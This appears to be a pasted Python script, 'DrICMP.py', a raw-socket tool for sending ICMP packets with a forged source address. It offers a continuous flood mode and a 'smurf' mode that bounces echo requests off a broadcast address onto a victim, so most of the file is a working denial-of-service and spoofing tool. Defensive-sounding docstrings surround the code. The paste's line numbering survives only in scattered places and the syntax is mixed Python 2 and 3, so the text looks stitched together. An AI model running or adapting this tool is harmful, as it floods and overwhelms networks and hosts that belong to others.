
DrICMP.py

a guest
Jul 16th, 2013
  1.  
  2. # some imports
  3. import socket, sys
  4. from struct import *
  5.  
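def checksum(msg):
    """Return the 16-bit Internet checksum (RFC 1071) of *msg*.

    The message is read as a sequence of big-endian 16-bit words, the words
    are added with end-around carry, and the one's complement of the result
    is returned.

    msg may be a byte string (whose items are integers on Python 3) or a
    text string of one-character items; both forms are accepted.
    An odd-length message is padded with one zero octet, as RFC 1071
    specifies, instead of raising IndexError on the last index.
    """
    # Normalise every item to an integer octet value.
    octets = [b if isinstance(b, int) else ord(b) for b in msg]

    # RFC 1071: an odd trailing octet is summed as if followed by a zero.
    if len(octets) % 2:
        octets.append(0)

    total = 0
    for i in range(0, len(octets), 2):
        total += (octets[i] << 8) + octets[i + 1]

    # Fold the carries back in until the sum fits in 16 bits. A single fold
    # is not enough: 0xffff + 0xffff + 0x0001 folds to 0x10000 the first
    # time, which still carries.
    while total >> 16:
        total = (total >> 16) + (total & 0xffff)

    return ~total & 0xffff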
  16.    
def main():
    """Parse sys.argv, build one IP+ICMP packet and send it on a raw socket.

    The socket is opened with IP_HDRINCL, so the IP header produced by
    ipHead() (including the source address) is sent as supplied by this
    script. One packet is built once and the same packet is re-sent in the
    flood loop.

    Modes, as implemented below:
      * default: source is the -s value if given, else the first address
        resolved for the local hostname; destination is the last argument.
      * -smurf: the last argument is written into the source field and the
        packet is addressed to the given broadcast address, with type 8,
        code 0 and flood forced on.

    Review notes for defenders: a packet whose source address does not
    belong to the sending network is dropped where source-address
    validation (BCP 38) is applied at the edge, and the -smurf mode depends
    on the broadcast network accepting directed broadcasts (RFC 2644 makes
    dropping them the router default). The packets carry the constant
    header values set in ipHead() and the default payload 0xf0ba7d0d unless
    -pl overrides it.

    The except clause and the bare print statement below are Python 2 syntax.
    """
    #Arguments and switches:
    argv = sys.argv
   
    #Help: any of -h, -? or -help prints the usage text and exits.
    if ('-h' in argv or '-?' in argv or '-help' in argv):
        print ("\n\n  ||  DrICMP by Ro0k.\n  ||  Ver 0.2 Released in 16.7.2013\n  ||  The cutest ICMP packets spoofing tool online!\n")
        print ("\tUsage: DrICMP.py [options] destinationIP")
        print ("\tSwitches available:")
        print("\t  -s IPaddr: Spoof the source ip address to be IPaddr")
        print("\t  -t type: ICMP type number (Defaults to 8, ping request)")
        print("\t  -c code: ICMP code number (Defaults to 0)")
        print("\t  -pl payload: The payload sent in the ICMP (Defaults to 0xf0ba7d0d)")
        print("\t  -f: Flood (Flooding the target instead of sending one packet)")
        print("\t  -smurf broadcastAddr: Smurf attack.")
        print("\n\t  Examples of use: DrICMP.py -t 3 -c 11 213.57.23.19")
        print("\t                   DrICMP.py -smurf 192.168.56.255 192.168.56.17")
        print("\n  For more information, Check Wikipedia's entry on ICMP, or simply google.")
        sys.exit()
   
    # Defaults. The last command-line token is always taken as the
    # destination, whether or not it is actually an address.
    args = {'dest':argv[-1], 'src':None, 'type': 8, 'code': 0, 'payload': 0xf0ba7d0d, 'flood': False,
        'broadcast':'192.168.255.255', 'smurf': False}
    # Each switch is found by membership test and its value is the token
    # that follows it; a switch given as the last token raises IndexError.
    if ('-s' in argv): args['src'] = argv[argv.index('-s')+1]; #Overriding the source IP address.
    if ('-t' in argv): args['type'] = int(argv[argv.index('-t')+1]); #Changing the ICMP Type.
    if ('-c' in argv): args['code'] = int(argv[argv.index('-c')+1]); #Changing the ICMP Code. (Defaults to Zero)
    if ('-pl' in argv): args['payload'] = int(argv[argv.index('-pl')+1], 16); #Changing the ICMP payload, parsed as hex. (Defaults to 0xf0ba7d0d)
    if ('-f' in argv): args['flood'] = True #Sending Packets in infinite loop (ctrl-c to break) instead of just one.
    if ('-smurf' in argv): args['smurf'] = True; args['broadcast'] = argv[argv.index('-smurf')+1];  #Smurf mode: the next token is the broadcast address.
   
    #create a raw socket (raw sockets normally need elevated privileges,
    #so this is the step that fails for an unprivileged user)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except socket.error , msg:
        print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
        sys.exit()
       
    # IP_HDRINCL: the caller supplies the IP header, which is what allows
    # an arbitrary source address to be written into it.
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
   
    packet = ''
    #In case of smurfing: the positional target becomes the packet's
    #source address and the packet is addressed to the broadcast address;
    #type, code and flood are overridden regardless of -t, -c and -f.
    if (args['smurf']):
        source_ip = args['dest']
        dest_ip = args['broadcast']
        args['type'] = 8
        args['code'] = 0
        args['flood'] = True
       
    else:
        if (args['src'] != None): source_ip = args['src'] #address spoofing
        else: source_ip = socket.gethostbyname_ex(socket.gethostname())[2][0] #first address resolved for the local hostname
        dest_ip = args['dest']
       
   
    #making the header + combining them:
    ipHeader = ipHead(source_ip, dest_ip)
    icmpHeader = icmpHead(args)
   
    packet = ipHeader + icmpHeader
   
    # One packet is always sent.
    s.sendto(packet, (dest_ip, 0))
   
    # Flood mode re-sends the identical packet with no delay and no exit
    # condition; the loop ends only when the process is interrupted.
    if (args['flood']):
        while(True):
            s.sendto(packet, (dest_ip, 0));
  81.    
def ipHead(source_ip, dest_ip):
    """Pack a 20-byte IPv4 header for an ICMP packet.

    source_ip and dest_ip are dotted-quad strings; they are converted with
    socket.inet_aton() and written into the header exactly as given.
    Everything else is a constant, so every header this function returns
    carries the same identification (54321) and TTL (255), which makes the
    traffic easy to match on.

    NOTE(review): total length is declared as 40 although the header plus
    the 8-byte ICMP message built by icmpHead() is 28 bytes, and the
    checksum field is a dummy 10. On Linux it is the kernel, not Python,
    that fills in both fields when IP_HDRINCL is set (raw(7)); behaviour on
    other platforms is not established by this file.
    """
    # Version 4 in the high nibble, header length of 5 32-bit words in the low.
    first_octet = (4 << 4) + 5

    header_fields = (
        first_octet,
        0,                            # type of service
        20 + 20,                      # total length (placeholder, see note)
        54321,                        # identification
        0,                            # flags and fragment offset
        255,                          # time to live
        socket.IPPROTO_ICMP,          # protocol
        10,                           # header checksum (placeholder, see note)
        socket.inet_aton(source_ip),  # source address, 4 bytes
        socket.inet_aton(dest_ip),    # destination address, 4 bytes
    )

    # '!' selects network (big-endian) byte order.
    return pack('!BBHHHBBH4s4s', *header_fields)
  102.    
def icmpHead(args):
    """Pack the 8-byte ICMP message described by *args*.

    args is the option dict built in main(); the keys read are 'type',
    'code' and 'payload'. The layout is type (1 byte), code (1 byte),
    checksum (2 bytes) and the payload as one 32-bit unsigned integer, all
    in network byte order.

    The message is packed twice: first with a zero checksum field so that
    checksum() can be computed over it, then again with the result in place.

    NOTE(review): the 32-bit 'payload' occupies the four bytes directly
    after the checksum. For an echo request (type 8) that is where the
    identifier and sequence number sit (RFC 792), so with the defaults the
    message has identifier/sequence 0xf0ba/0x7d0d and no data bytes after
    the header.
    """
    icmp_type, icmp_code, body = args['type'], args['code'], args['payload']
    layout = '!BBHI'  # '!' selects network (big-endian) byte order

    # Checksum field must be zero while the checksum is being calculated.
    unchecked = pack(layout, icmp_type, icmp_code, 0, body)

    return pack(layout, icmp_type, icmp_code, checksum(unchecked), body)
  117.    
# Run main() only when the file is executed as a script, not when it is imported.
if __name__ == "__main__":
    main()